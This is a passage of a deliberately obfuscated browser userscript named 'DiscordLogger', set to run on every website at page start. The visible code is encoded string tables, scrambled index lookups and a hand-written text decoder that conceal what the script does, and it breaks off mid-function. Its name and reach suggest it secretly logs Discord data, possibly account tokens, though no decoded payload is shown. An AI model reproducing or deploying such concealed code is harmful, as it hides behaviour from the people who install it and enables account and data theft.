window["__f__lvnkk2q1.u76"] = function() {
    with (this) {
        (async(u,{p, r, s})=>{
            try {
                r(u, s, [undefined, undefined, undefined, p.GM_setValue, p.GM_getValue, p.unsafeWindow, p.GM_info, p.GM]);
            } catch (e) {
                if (e.message && e.stack) {
                    console.error("ERROR: Execution of script 'DiscordLogger' failed! " + e.message);
                    console.log(e.stack);
                } else {
                    console.error(e);
                }
            }
        }
        )(async function(define, module, exports, GM_setValue, GM_getValue, unsafeWindow, GM_info, GM) {
            // ==UserScript==
            // @name         DiscordLogger
            // @namespace    npc
            // @version      1.2
            // @description  Fixed
            // @author       Me
            // @run-at       document-start
            // @match        *://*
            // @grant        GM_setValue
            // @grant        GM_getValue
            // ==/UserScript==

            var OblzcV1, bWIcos, RAk6FYK, R8kMhwH, KYEFRmd, TtfRCYa, i97aYg, TBU85Q, f_IMfQY, EoEOhk, EwaGoLA, Xv7XB_p, sIbulf, Ilr3XK, _L73X4o, MxsDFba;
            function i1sC6Va(bWIcos) {
                return OblzcV1[bWIcos < 0x65 ? bWIcos < 0x34 ? bWIcos - 0x5e : bWIcos < 0x34 ? bWIcos - 0x55 : bWIcos > 0x65 ? bWIcos + 0x2 : bWIcos > 0x34 ? bWIcos < 0x65 ? bWIcos > 0x65 ? bWIcos + 0x4f : bWIcos - 0x35 : bWIcos - 0x3f : bWIcos - 0x3f : bWIcos + 0x15]
            }
            OblzcV1 = NjtUI9.call(this);
            var HGQbWZQ = []
              , D5eS7Q = 0x0
              , wrMf0u8 = w_KcLb(()=>{
                var OblzcV1 = ['Llmf(w7X#P', 'rdv/71eYz5b*nm~jm,E:]^1#TTw<HnbX+/uHa`T1r4$OXC', 'nR=a|hz;W$_Z/Y#R|%+3W', 'PxDg#3_@[J5LlQUp0JYGHy<0NS5OE,{i6w,c8n#B', 'TPzd"hHN&8qKB', 'XPU=>[aC', ']DwJb', '+4!3Vr){6Ufc*MMOH}ag0lx`}O', '_4AD/wt;sI@1/x=O#Up;;^<YlzlcSlDSNoO<Ed=H##T]@EUc4!L.jcnB', '#iDydj;*l3i', 'ePW/*r~L(T7Z9@nZ$XoJ:^*#O&b&o,ad3!<F', '9LtHV<=*tOL*,7>U7],JYf|j,NvS8DHaxA', 'I%&dNkye40Hb),$Y/G)dr2rB', 'Er7g}`ye3Ri0n,"d[/*H(*I+;4]BB', ']iqz06x;6L', 'Y8I;?560_9RNY,:UTuSgr24),RE%lF`c|!iFYo|Hv8f{HnshW#{/ienjjM:g[Mzi$oyz4.6uM4m7`Y~jY=JGa^`to3#4!Nfq.+ygg/Fj.H(L|mlfQDBIl;@@+$pcq*YdCd9f18se8!x![NjZ^i[GulHd05s@4PZcjXr.N,Ie*2F]@Psh]fvc$.^B', '/z#0QruY7V&cB', '5/[en#A', 'vrFa8iQe<!GeB', 'Y8I;?560_9RNY,:UTuSgr24),R;8|C', '[z>3Xm}GE', 'Y8I;?560^Qq*qOsbMG{<S>o)NS$cTa3dzA', 'A)@eF*A', 'TzOxF*A', 'C8[eF*A', 'nz;I!8A', 'LuR;C!rX/!)u8@Inc%XJs4n#E', '@wTw6.h`$PoLzCZdSlC', '?79yF39`!M90})eSJPDgs@F5E', 'Hz?eUo35o36ZB', 'rz>3XmV#7V!xWC5X+A', '$zTw6.h`$Pk', '2MF,Ty}YpLi', 'OMU1X`yMa4|P5whX', 'OMM=^a^By84ZvC:Uw,BeSYpB', 'LuSwt#A', 'j8X>|ms:tI2xqC', 'ZMMaL<8GE', 'G))aXvT1>L', 'dP(gt@mCmUW6GF', '"O1KNwJT1T20CF', 'Xa$J$n!MM%$@B', '/7B2c,uC', 'Q5zg7=YC', 'gzzgh`A', '*zbgmv{Y;Ry&N.`o', '*zbgmv^HL%r&98M', 'c8NKa', 'hrZ2b', '9oefB.H[;Ry', 'PPX<5+UC', '*zbgb', 'rreHt@H[QS', 'y5ufunA', 'Au7I0lljF', 'drF:h@,B', 'C#F<Q0VBH', 'Hu@Jk`A', '+R>fr4yC', 'fG^F%w_o%5qOdwQbFrzd[5eYAP;gMP+f#G(Ic,5ph#77&xrmlrjgs@DZ7UB>xQGrgw_,$k_i$Js@Tj$MaRDa7dq)L1<[3vwV[|O/7%q{{9G`C/LM', 'xoef9_tjG', '}zf/jj4C', ',)m/ixSC', 'vzV<F?0uH', 'k2FfIk0oH', 'rr|0BkFpG', 'PPuf7=UCK%L)|a{oeB', 'KEDgg,A', 'ar%2L:keM%gwC9M'];
                return D5eS7Q ? OblzcV1.pop() : D5eS7Q++,
                OblzcV1
            }
            , 0x0)();
            function EHfzf4() {
                try {
                    return global || window || new Function('return this')()
                } catch (e) {
                    try {
                        return this
                    } catch (e) {
                        return {}
                    }
                }
            }
            !(bWIcos = EHfzf4() || {},
            RAk6FYK = bWIcos.TextDecoder,
            R8kMhwH = bWIcos.Uint8Array,
            KYEFRmd = bWIcos.Buffer,
            TtfRCYa = bWIcos.String || String,
            i97aYg = bWIcos.Array || Array,
            TBU85Q = w_KcLb(()=>{
                var bWIcos = new i97aYg(0x80), RAk6FYK, R8kMhwH;
                !(RAk6FYK = TtfRCYa.fromCodePoint || TtfRCYa.fromCharCode,
                R8kMhwH = []);
                return w_KcLb(KYEFRmd=>{
                    var i97aYg, TBU85Q;
                    function f_IMfQY(KYEFRmd) {
                        return OblzcV1[KYEFRmd > 0x6e ? KYEFRmd + 0x12 : KYEFRmd > 0x6e ? KYEFRmd + 0x3d : KYEFRmd < 0x6e ? KYEFRmd < 0x3d ? KYEFRmd + 0x8 : KYEFRmd < 0x6e ? KYEFRmd < 0x3d ? KYEFRmd - 0x5 : KYEFRmd > 0x6e ? KYEFRmd + 0xd : KYEFRmd < 0x6e ? KYEFRmd > 0x6e ? KYEFRmd + 0x64 : KYEFRmd - 0x3e : KYEFRmd + 0x5 : KYEFRmd + 0x57 : KYEFRmd + 0x3d]
                    }
                    var EoEOhk, EwaGoLA;
                    !(i97aYg = KYEFRmd.length,
                    R8kMhwH.length = f_IMfQY(0x4a));
                    for (TBU85Q = 0x0; TBU85Q < i97aYg; ) {
                        var Xv7XB_p = w_KcLb(KYEFRmd=>{
                            return OblzcV1[KYEFRmd < 0x1e ? KYEFRmd - 0x59 : KYEFRmd > 0x1e ? KYEFRmd > 0x4f ? KYEFRmd + 0x49 : KYEFRmd > 0x1e ? KYEFRmd > 0x1e ? KYEFRmd < 0x1e ? KYEFRmd + 0x58 : KYEFRmd - 0x1f : KYEFRmd - 0x32 : KYEFRmd - 0x5b : KYEFRmd - 0x3]
                        }
                        , 0x1);
                        EwaGoLA = KYEFRmd[TBU85Q++];
                        if (EwaGoLA <= 0x7f) {
                            EoEOhk = EwaGoLA
                        } else {
                            if (EwaGoLA <= 0xdf) {
                                var sIbulf = w_KcLb(KYEFRmd=>{
                                    return OblzcV1[KYEFRmd < 0x62 ? KYEFRmd < 0x31 ? KYEFRmd + 0x24 : KYEFRmd > 0x62 ? KYEFRmd + 0x38 : KYEFRmd < 0x31 ? KYEFRmd - 0x2f : KYEFRmd < 0x62 ? KYEFRmd > 0x31 ? KYEFRmd - 0x32 : KYEFRmd + 0x49 : KYEFRmd + 0x32 : KYEFRmd + 0x37]
                                }
                                , 0x1);
                                EoEOhk = (EwaGoLA & 0x1f) << i1sC6Va(0x36) | KYEFRmd[TBU85Q++] & sIbulf(0x32)
                            } else {
                                if (EwaGoLA <= Xv7XB_p(0x30)) {
                                    EoEOhk = (EwaGoLA & 0xf) << 0xc | (KYEFRmd[TBU85Q++] & i1sC6Va(0x35)) << 0x6 | KYEFRmd[TBU85Q++] & 0x3f
                                } else {
                                    if (TtfRCYa.fromCodePoint) {
                                        var Ilr3XK = w_KcLb(KYEFRmd=>{
                                            return OblzcV1[KYEFRmd < -0x13 ? KYEFRmd < -0x13 ? KYEFRmd < -0x13 ? KYEFRmd < -0x13 ? KYEFRmd < -0x13 ? KYEFRmd + 0x43 : KYEFRmd - 0x5f : KYEFRmd - 0x38 : KYEFRmd - 0x2d : KYEFRmd - 0x26 : KYEFRmd - 0x18]
                                        }
                                        , 0x1);
                                        EoEOhk = (EwaGoLA & 0x7) << 0x12 | (KYEFRmd[TBU85Q++] & 0x3f) << f_IMfQY(0x55) | (KYEFRmd[TBU85Q++] & 0x3f) << Ilr3XK(-0x42) | KYEFRmd[TBU85Q++] & 0x3f
                                    } else {
                                        var _L73X4o = w_KcLb(KYEFRmd=>{
                                            return OblzcV1[KYEFRmd < 0x66 ? KYEFRmd < 0x66 ? KYEFRmd < 0x66 ? KYEFRmd - 0x36 : KYEFRmd + 0x44 : KYEFRmd + 0x42 : KYEFRmd + 0x2b]
                                        }
                                        , 0x1);
                                        !(EoEOhk = _L73X4o(0x36),
                                        TBU85Q += i1sC6Va(0x3d))
                                    }
                                }
                            }
                        }
                        R8kMhwH.push(bWIcos[EoEOhk] || (bWIcos[EoEOhk] = RAk6FYK(EoEOhk)))
                    }
                    return R8kMhwH.join('')
                }
                , 0x1)
            }
            , 0x0)());
            function oAgZ8a(bWIcos) {
                var TtfRCYa = w_KcLb(bWIcos=>{
                    return OblzcV1[bWIcos < 0x0 ? bWIcos > 0x0 ? bWIcos - 0xe : bWIcos < -0x31 ? bWIcos + 0x53 : bWIcos < -0x31 ? bWIcos - 0x48 : bWIcos > 0x0 ? bWIcos - 0x14 : bWIcos > 0x0 ? bWIcos + 0x48 : bWIcos > 0x0 ? bWIcos - 0x55 : bWIcos + 0x30 : bWIcos + 0x43]
                }
                , 0x1);
                return typeof RAk6FYK !== i1sC6Va(0x37) && RAk6FYK ? new RAk6FYK().decode(new R8kMhwH(bWIcos)) : typeof KYEFRmd !== TtfRCYa(-0x2e) && KYEFRmd ? KYEFRmd.from(bWIcos).toString('utf-8') : TBU85Q(bWIcos)
            }
            !(f_IMfQY = {
                OoWzTG: q54EWbN(0x41)
            },
            EoEOhk = q54EWbN[i1sC6Va(0x3a)](i1sC6Va(0x38), [0x3d]),
            EwaGoLA = q54EWbN(i1sC6Va(0x39)),
            Xv7XB_p = q54EWbN(0x27),
            sIbulf = [q54EWbN(i1sC6Va(0x49)), q54EWbN.apply(i1sC6Va(0x38), [i1sC6Va(0x4d)]), q54EWbN(i1sC6Va(0x62)), q54EWbN(0x30), q54EWbN.call(i1sC6Va(0x38), 0x37)],
            Ilr3XK = q54EWbN(i1sC6Va(0x4b)),
            _L73X4o = w_KcLb(()=>{
                var bWIcos;
                function RAk6FYK(bWIcos) {
                    return OblzcV1[bWIcos > 0x53 ? bWIcos + 0x1a : bWIcos > 0x53 ? bWIcos + 0xe : bWIcos < 0x22 ? bWIcos + 0x2e : bWIcos < 0x22 ? bWIcos - 0x2a : bWIcos - 0x23]
                }
                bWIcos = {
                    Bc9wPP: [],
                    EehkQw: w_KcLb((bWIcos=q54EWbN[RAk6FYK(0x30)](i1sC6Va(0x38), RAk6FYK(0x27)))=>{
                        if (!_L73X4o.Bc9wPP[0x0]) {
                            _L73X4o.Bc9wPP.push(i1sC6Va(0x53))
                        }
                        return _L73X4o.Bc9wPP[bWIcos]
                    }
                    , 0x0)
                };
                return bWIcos
            }
            , 0x0)());
            function b_d2PUs(bWIcos, RAk6FYK) {
                var R8kMhwH = w_KcLb(bWIcos=>{
                    return OblzcV1[bWIcos < 0x49 ? bWIcos - 0xd : bWIcos > 0x7a ? bWIcos + 0x59 : bWIcos > 0x49 ? bWIcos > 0x49 ? bWIcos - 0x4a : bWIcos - 0xf : bWIcos + 0x5c]
                }
                , 0x1);
                switch (MxsDFba) {
                case R8kMhwH(0x50):
                    return -bWIcos;
                case 0x3:
                    return bWIcos + RAk6FYK;
                case -R8kMhwH(0x53):
                    return bWIcos - RAk6FYK;
                case i1sC6Va(0x36):
                    return typeof bWIcos;
                case R8kMhwH(0x6a):
                    return !bWIcos;
                case _L73X4o.EehkQw() ? 0xc : 0xd2:
                    return void bWIcos;
                case -0x2d:
                    return bWIcos * RAk6FYK
                }
            }
            function KaScbe(OblzcV1) {
                return OblzcV1 = MxsDFba + (MxsDFba = OblzcV1,
                0x0),
                OblzcV1
            }
            typeof (MxsDFba = MxsDFba,
            function() {
                var bWIcos, RAk6FYK, R8kMhwH, KYEFRmd, TtfRCYa, i97aYg, TBU85Q, HGQbWZQ, D5eS7Q, wrMf0u8, EHfzf4, oAgZ8a, pg8_Mku, NjtUI9, uWAcdV, Knxy9z, tYd_UKd, sD0FIDo, e7lDmn, Ais7FrM, HiOSudS;
                function oOB_fmE(bWIcos) {
                    return OblzcV1[bWIcos > -0x3f ? bWIcos > -0xe ? bWIcos - 0x2d : bWIcos < -0x3f ? bWIcos - 0x38 : bWIcos > -0x3f ? bWIcos > -0xe ? bWIcos + 0x28 : bWIcos < -0xe ? bWIcos + 0x3e : bWIcos - 0x36 : bWIcos + 0x5c : bWIcos - 0x43]
                }
                !(bWIcos = q54EWbN(0x39),
                RAk6FYK = q54EWbN[i1sC6Va(0x3a)](void 0x0, [0x35]),
                R8kMhwH = q54EWbN(0x2d),
                KYEFRmd = q54EWbN(0x12),
                TtfRCYa = [q54EWbN[i1sC6Va(0x3a)](i1sC6Va(0x38), [0x11]), q54EWbN(i1sC6Va(0x3b)), q54EWbN(0x31), q54EWbN(0x36)],
                i97aYg = {
                    wtFMcE: q54EWbN(i1sC6Va(0x4e)),
                    l51b5o: q54EWbN[oOB_fmE(-0x39)](void 0x0, [0x29])
                },
                TBU85Q = TBU85Q,
                HGQbWZQ = HGQbWZQ,
                D5eS7Q = D5eS7Q,
                wrMf0u8 = wrMf0u8,
                EHfzf4 = EHfzf4,
                oAgZ8a = oAgZ8a,
                pg8_Mku = pg8_Mku,
                NjtUI9 = NjtUI9,
                uWAcdV = uWAcdV,
                Knxy9z = Knxy9z,
                tYd_UKd = tYd_UKd,
                sD0FIDo = sD0FIDo);
                function Xr1BPhT(bWIcos) {
                    var RAk6FYK = w_KcLb(bWIcos=>{
                        return OblzcV1[bWIcos < -0x56 ? bWIcos + 0x4d : bWIcos < -0x25 ? bWIcos < -0x56 ? bWIcos - 0x26 : bWIcos < -0x56 ? bWIcos + 0x5d : bWIcos < -0x56 ? bWIcos - 0x4 : bWIcos < -0x56 ? bWIcos + 0x4c : bWIcos > -0x56 ? bWIcos > -0x25 ? bWIcos - 0x42 : bWIcos + 0x55 : bWIcos - 0xf : bWIcos - 0x59]
                    }
                    , 0x1);
                    return TBU85Q[bWIcos < b_d2PUs(0x1, MxsDFba = i1sC6Va(0x3b)) ? bWIcos > b_d2PUs(RAk6FYK(-0x4f), MxsDFba = i1sC6Va(0x3b)) ? bWIcos > b_d2PUs(0x15, KaScbe(0x15)) ? bWIcos < b_d2PUs(0x1, KaScbe(0x15)) ? bWIcos > b_d2PUs(i1sC6Va(0x3c), MxsDFba = 0x15) ? b_d2PUs(bWIcos, 0x36, MxsDFba = 0x3) : bWIcos < b_d2PUs(0x1, KaScbe(RAk6FYK(-0x4f))) ? bWIcos > b_d2PUs(oOB_fmE(-0x37), KaScbe(RAk6FYK(-0x4f))) ? b_d2PUs(bWIcos, 0x63, KaScbe(0x3)) : bWIcos > b_d2PUs(RAk6FYK(-0x4e), KaScbe(0x15)) ? b_d2PUs(bWIcos, RAk6FYK(-0x30), MxsDFba = oOB_fmE(-0x36)) : bWIcos < b_d2PUs(oOB_fmE(-0x38), KaScbe(0x15)) ? b_d2PUs(bWIcos, 0x64, MxsDFba = RAk6FYK(-0x4d)) : b_d2PUs(bWIcos, 0x14, KaScbe(0x3)) : b_d2PUs(bWIcos, 0x29, KaScbe(-oOB_fmE(-0x35))) : b_d2PUs(bWIcos, 0x43, KaScbe(oOB_fmE(-0x36))) : b_d2PUs(bWIcos, 0x16, KaScbe(i1sC6Va(0x3d))) : b_d2PUs(bWIcos, 0xb, KaScbe(RAk6FYK(-0x4d))) : b_d2PUs(bWIcos, 0x1c, KaScbe(i1sC6Va(0x3d)))]
                }
                void (e7lDmn = (TBU85Q = xpApj4J[q54EWbN(0x6)](this),
                []),
                Ais7FrM = Xr1BPhT(b_d2PUs(0x14, KaScbe(0x15))),
                HiOSudS = dJTG4Xu(()=>{
                    var bWIcos, RAk6FYK, R8kMhwH;
                    function HGQbWZQ(bWIcos) {
                        return OblzcV1[bWIcos > 0x35 ? bWIcos + 0xb : bWIcos < 0x35 ? bWIcos < 0x4 ? bWIcos + 0x30 : bWIcos < 0x4 ? bWIcos - 0x43 : bWIcos > 0x35 ? bWIcos + 0x58 : bWIcos < 0x4 ? bWIcos - 0x26 : bWIcos > 0x35 ? bWIcos - 0x57 : bWIcos > 0x4 ? bWIcos > 0x35 ? bWIcos + 0x46 : bWIcos - 0x5 : bWIcos - 0x29 : bWIcos + 0x30]
                    }
                    !(bWIcos = [q54EWbN[oOB_fmE(-0x39)](void 0x0, [0x13]), q54EWbN(i1sC6Va(0x57))],
                    RAk6FYK = {
                        G_PkCD: q54EWbN(0x9),
                        [oOB_fmE(-0x34)]: q54EWbN(HGQbWZQ(0xe)),
                        [i1sC6Va(0x40)]: q54EWbN(0xc),
                        zYZCcST: q54EWbN(0xd)
                    },
                    R8kMhwH = [q54EWbN(oOB_fmE(-0x2e)), q54EWbN(0x8), RAk6FYK.G_PkCD, Ilr3XK, RAk6FYK[HGQbWZQ(0xf)], RAk6FYK[oOB_fmE(-0x33)], RAk6FYK.zYZCcST, q54EWbN(0xe), i97aYg.wtFMcE, q54EWbN(0x10), TtfRCYa[HGQbWZQ(0x11)], KYEFRmd, bWIcos[oOB_fmE(-0x32)], q54EWbN[oOB_fmE(-0x31)](HGQbWZQ(0x8), 0x14), TtfRCYa[oOB_fmE(-0x37)], q54EWbN(0x16), sIbulf[0x0], sIbulf[i1sC6Va(0x3c)], q54EWbN(0x19), q54EWbN(0x1a), q54EWbN(0x1b), q54EWbN(oOB_fmE(-0x21)), q54EWbN(0x1d), bWIcos[i1sC6Va(0x3c)], q54EWbN(0x1f), sIbulf[oOB_fmE(-0x2c)], q54EWbN(0x21), q54EWbN(0x22), q54EWbN(0x23), q54EWbN(i1sC6Va(0x54)), q54EWbN[i1sC6Va(0x42)](oOB_fmE(-0x3b), 0x25), q54EWbN(0x26)]);
                    return Ais7FrM ? R8kMhwH.pop() : Ais7FrM++,
                    R8kMhwH
                }
                , 0x0)());
                function EaOD_5() {
                    try {
                        return global || window || new Function(Xv7XB_p)()
                    } catch (e) {
                        try {
                            return this
                        } catch (e) {
                            return {}
                        }
                    }
                }
                b_d2PUs((HGQbWZQ = EaOD_5() || {},
                D5eS7Q = HGQbWZQ[q54EWbN(0x28)],
                wrMf0u8 = HGQbWZQ[i97aYg.l51b5o],
                EHfzf4 = HGQbWZQ[q54EWbN[i1sC6Va(0x3a)](void 0x0, [0x2a])],
                oAgZ8a = HGQbWZQ[q54EWbN(i1sC6Va(0x48))] || String,
                pg8_Mku = HGQbWZQ[q54EWbN(0x2c)] || Array,
                NjtUI9 = dJTG4Xu(()=>{
                    var bWIcos, RAk6FYK, KYEFRmd;
                    function TtfRCYa(bWIcos) {
                        return OblzcV1[bWIcos > 0xa ? bWIcos - 0x57 : bWIcos > -0x27 ? bWIcos < 0xa ? bWIcos > -0x27 ? bWIcos < -0x27 ? bWIcos - 0x13 : bWIcos + 0x26 : bWIcos + 0xd : bWIcos + 0xc : bWIcos + 0x58]
                    }
                    typeof (bWIcos = new pg8_Mku(0x80),
                    RAk6FYK = RAk6FYK,
                    KYEFRmd = KYEFRmd);
                    return b_d2PUs((RAk6FYK = oAgZ8a[R8kMhwH] || oAgZ8a[q54EWbN.apply(void 0x0, [0x2e])],
                    KYEFRmd = []), KaScbe(0x6)),
                    dJTG4Xu(TtfRCYa=>{
                        var R8kMhwH, i97aYg, Ais7FrM, HiOSudS, EaOD_5;
                        function trBscdE(TtfRCYa) {
                            return OblzcV1[TtfRCYa < 0x9 ? TtfRCYa + 0x27 : TtfRCYa + 0x15]
                        }
                        typeof (R8kMhwH = q54EWbN[i1sC6Va(0x42)](i1sC6Va(0x38), trBscdE(-0x23)),
                        i97aYg = i97aYg,
                        Ais7FrM = Ais7FrM,
                        HiOSudS = HiOSudS,
                        EaOD_5 = EaOD_5);
                        for (EaOD_5 = (b_d2PUs((HiOSudS = TtfRCYa[R8kMhwH],
                        KYEFRmd[EwaGoLA] = i1sC6Va(0x41)), KaScbe(0x19)),
                        Xr1BPhT(b_d2PUs(0x14, MxsDFba = oOB_fmE(-0x38)))); EaOD_5 < HiOSudS; ) {
                            if ((Ais7FrM = TtfRCYa[EaOD_5++],
                            Ais7FrM) <= 0x7f && _L73X4o.EehkQw()) {
                                i97aYg = Ais7FrM
                            } else {
                                if (Ais7FrM <= 0xdf) {
                                    var VLtDhz = dJTG4Xu(R8kMhwH=>{
                                        var i97aYg = w_KcLb(R8kMhwH=>{
                                            return OblzcV1[R8kMhwH > 0x7d ? R8kMhwH + 0xc : R8kMhwH > 0x7d ? R8kMhwH + 0x57 : R8kMhwH > 0x7d ? R8kMhwH + 0x30 : R8kMhwH < 0x7d ? R8kMhwH < 0x7d ? R8kMhwH > 0x7d ? R8kMhwH + 0x10 : R8kMhwH < 0x7d ? R8kMhwH < 0x7d ? R8kMhwH > 0x7d ? R8kMhwH + 0x9 : R8kMhwH - 0x4d : R8kMhwH + 0x42 : R8kMhwH + 0x5b : R8kMhwH - 0x3e : R8kMhwH - 0x47]
                                        }
                                        , 0x1);
                                        return TBU85Q[R8kMhwH < b_d2PUs(i97aYg(0x5c), MxsDFba = trBscdE(-0x21)) ? R8kMhwH > b_d2PUs(i97aYg(0x5b), MxsDFba = 0x15) ? R8kMhwH > b_d2PUs(trBscdE(-0x19), MxsDFba = 0x15) ? R8kMhwH < b_d2PUs(oOB_fmE(-0x2f), KaScbe(i1sC6Va(0x3b))) ? b_d2PUs(R8kMhwH, i97aYg(0x77), MxsDFba = 0x3) : b_d2PUs(R8kMhwH, i1sC6Va(0x45), MxsDFba = 0x3) : b_d2PUs(R8kMhwH, 0x15, KaScbe(-i97aYg(0x56))) : b_d2PUs(R8kMhwH, 0x9, KaScbe(-0xb)) : b_d2PUs(R8kMhwH, 0x61, KaScbe(-0xb))]
                                    }
                                    , 0x1);
                                    i97aYg = (Ais7FrM & oOB_fmE(-0x15)) << VLtDhz(b_d2PUs(0x52, MxsDFba = trBscdE(-0x21))) | TtfRCYa[EaOD_5++] & VLtDhz(b_d2PUs(0x53, KaScbe(0x15)))
                                } else {
                                    var zjNvVvv = w_KcLb(TtfRCYa=>{
                                        return OblzcV1[TtfRCYa < 0x2b ? TtfRCYa + 0x42 : TtfRCYa > 0x5c ? TtfRCYa - 0x46 : TtfRCYa < 0x2b ? TtfRCYa - 0x31 : TtfRCYa < 0x5c ? TtfRCYa > 0x5c ? TtfRCYa + 0x13 : TtfRCYa < 0x5c ? TtfRCYa < 0x5c ? TtfRCYa - 0x2c : TtfRCYa + 0x4b : TtfRCYa + 0x18 : TtfRCYa - 0x6]
                                    }
                                    , 0x1);
                                    if (Ais7FrM <= zjNvVvv(0x3d)) {
                                        var She4E1 = dJTG4Xu(R8kMhwH=>{
                                            var i97aYg = w_KcLb(R8kMhwH=>{
                                                return OblzcV1[R8kMhwH < 0x52 ? R8kMhwH - 0x1c : R8kMhwH > 0x52 ? R8kMhwH > 0x52 ? R8kMhwH < 0x83 ? R8kMhwH > 0x83 ? R8kMhwH - 0x10 : R8kMhwH - 0x53 : R8kMhwH - 0x1e : R8kMhwH - 0x0 : R8kMhwH - 0x5]
                                            }
                                            , 0x1);
                                            return TBU85Q[R8kMhwH < 0x37 ? b_d2PUs(R8kMhwH, oOB_fmE(-0x2c), MxsDFba = -0xb) : R8kMhwH < 0x4b ? b_d2PUs(R8kMhwH, 0x38, KaScbe(-oOB_fmE(-0x35))) : b_d2PUs(R8kMhwH, 0x47, KaScbe(-i97aYg(0x5c)))]
                                        }
                                        , 0x1);
                                        i97aYg = (Ais7FrM & Xr1BPhT(b_d2PUs(0xd, MxsDFba = 0x15))) << 0xc | (TtfRCYa[EaOD_5++] & Xr1BPhT(b_d2PUs(0x13, KaScbe(0x15)))) << Xr1BPhT(b_d2PUs(0x12, MxsDFba = 0x15)) | TtfRCYa[EaOD_5++] & She4E1(0x39)
                                    } else {
                                        if (oAgZ8a[q54EWbN(0x2d)]) {
                                            var xR4Dh32;
                                            function OuUfPd5(TtfRCYa) {
                                                return OblzcV1[TtfRCYa > -0x2e ? TtfRCYa - 0x2b : TtfRCYa > -0x2e ? TtfRCYa + 0x29 : TtfRCYa < -0x2e ? TtfRCYa > -0x2e ? TtfRCYa + 0x5f : TtfRCYa > -0x2e ? TtfRCYa + 0x2a : TtfRCYa < -0x2e ? TtfRCYa + 0x5e : TtfRCYa + 0x61 : TtfRCYa + 0xc]
                                            }
                                            void (xR4Dh32 = dJTG4Xu(R8kMhwH=>{
                                                var i97aYg = w_KcLb(R8kMhwH=>{
                                                    return OblzcV1[R8kMhwH < -0x11 ? R8kMhwH > -0x11 ? R8kMhwH + 0x46 : R8kMhwH > -0x42 ? R8kMhwH > -0x11 ? R8kMhwH + 0x1a : R8kMhwH + 0x41 : R8kMhwH + 0x31 : R8kMhwH - 0x5f]
                                                }
                                                , 0x1);
                                                return TBU85Q[R8kMhwH > b_d2PUs(zjNvVvv(0x3f), MxsDFba = trBscdE(-0x21)) ? R8kMhwH < b_d2PUs(0x2b, MxsDFba = 0x15) ? b_d2PUs(R8kMhwH, 0x7, KaScbe(-trBscdE(-0x1e))) : R8kMhwH < b_d2PUs(0x17, KaScbe(0x15)) ? R8kMhwH > b_d2PUs(zjNvVvv(0x40), MxsDFba = 0x15) ? b_d2PUs(R8kMhwH, 0x59, KaScbe(-i97aYg(-0x38))) : R8kMhwH < b_d2PUs(i1sC6Va(0x48), MxsDFba = 0x15) ? b_d2PUs(R8kMhwH, trBscdE(-0x12), KaScbe(-0xb)) : R8kMhwH > b_d2PUs(i97aYg(-0x2e), KaScbe(i1sC6Va(0x3b))) ? R8kMhwH < b_d2PUs(0x2b, MxsDFba = zjNvVvv(0x32)) ? b_d2PUs(R8kMhwH, i1sC6Va(0x3c), KaScbe(-zjNvVvv(0x35))) : b_d2PUs(R8kMhwH, i1sC6Va(0x61), KaScbe(0x3)) : b_d2PUs(R8kMhwH, 0x50, KaScbe(-i1sC6Va(0x3e))) : b_d2PUs(R8kMhwH, 0x47, MxsDFba = i97aYg(-0x39)) : b_d2PUs(R8kMhwH, 0x3a, MxsDFba = i97aYg(-0x39))]
                                            }
                                            , oOB_fmE(-0x37)),
                                            i97aYg = (Ais7FrM & zjNvVvv(0x3c)) << 0x12 | (TtfRCYa[EaOD_5++] & xR4Dh32(b_d2PUs(0x29, KaScbe(OuUfPd5(-0x58))))) << 0xc | (TtfRCYa[EaOD_5++] & i1sC6Va(0x35)) << zjNvVvv(0x2d) | TtfRCYa[EaOD_5++] & 0x3f)
                                        } else {
                                            b_d2PUs((i97aYg = 0x3f,
                                            EaOD_5 += 0x3), MxsDFba = 0x6)
                                        }
                                    }
                                }
                            }
                            KYEFRmd[q54EWbN.apply(void 0x0, [trBscdE(-0x12)])](bWIcos[i97aYg] || (bWIcos[i97aYg] = RAk6FYK(i97aYg)))
                        }
                        return KYEFRmd[sIbulf[oOB_fmE(-0x36)]]('')
                    }
                    , TtfRCYa(-0x1f))
                }
                , 0x0)()), KaScbe(0xc));
                function trBscdE(bWIcos) {
                    var R8kMhwH = w_KcLb(bWIcos=>{
                        return OblzcV1[bWIcos < 0x5a ? bWIcos > 0x5a ? bWIcos - 0x3b : bWIcos < 0x29 ? bWIcos + 0x2c : bWIcos - 0x2a : bWIcos + 0x1d]
                    }
                    , 0x1);
                    return typeof D5eS7Q !== q54EWbN.call(R8kMhwH(0x2d), 0x31) && D5eS7Q ? new D5eS7Q()[q54EWbN(0x32)](new wrMf0u8(bWIcos)) : typeof EHfzf4 !== TtfRCYa[0x2] && EHfzf4 ? EHfzf4[q54EWbN(oOB_fmE(-0x22))](bWIcos)[q54EWbN(0x34)](RAk6FYK) : NjtUI9(bWIcos)
                }
                b_d2PUs((uWAcdV = [XRlasE(Xr1BPhT(b_d2PUs(i1sC6Va(0x39), KaScbe(oOB_fmE(-0x38))))), XRlasE(oOB_fmE(-0x28))],
                Knxy9z = {
                    [Xr1BPhT(b_d2PUs(oOB_fmE(-0x17), KaScbe(0x15)))]: XRlasE(Xr1BPhT(b_d2PUs(0x2, KaScbe(i1sC6Va(0x3b))))),
                    [Xr1BPhT(b_d2PUs(0x10, KaScbe(oOB_fmE(-0x38))))]: XRlasE(Xr1BPhT(b_d2PUs(oOB_fmE(-0x27), KaScbe(oOB_fmE(-0x38))))),
                    [TtfRCYa[0x3]]: XRlasE(0xf),
                    [Xr1BPhT(b_d2PUs(i1sC6Va(0x3e), MxsDFba = 0x15))]: XRlasE(i1sC6Va(0x3b)),
                    [sIbulf[0x4]]: XRlasE(0x16),
                    [Xr1BPhT(b_d2PUs(i1sC6Va(0x4b), KaScbe(i1sC6Va(0x3b))))]: XRlasE(oOB_fmE(-0x26))
                },
                tYd_UKd = dJTG4Xu(()=>{
                    var bWIcos;
                    function RAk6FYK(bWIcos) {
                        return OblzcV1[bWIcos < -0x21 ? bWIcos - 0x41 : bWIcos < 0x10 ? bWIcos + 0x20 : bWIcos - 0x61]
                    }
                    bWIcos = {
                        [q54EWbN(0x38)]: XRlasE[q54EWbN[i1sC6Va(0x42)](RAk6FYK(-0x1d), i1sC6Va(0x36))](Xr1BPhT(b_d2PUs(oOB_fmE(-0x10), KaScbe(oOB_fmE(-0x38)))), RAk6FYK(-0x10))
                    };
                    return bWIcos
                }
                , 0x0)()), MxsDFba = oOB_fmE(-0x3d));
                function VLtDhz(bWIcos, RAk6FYK) {
                    switch (sD0FIDo) {
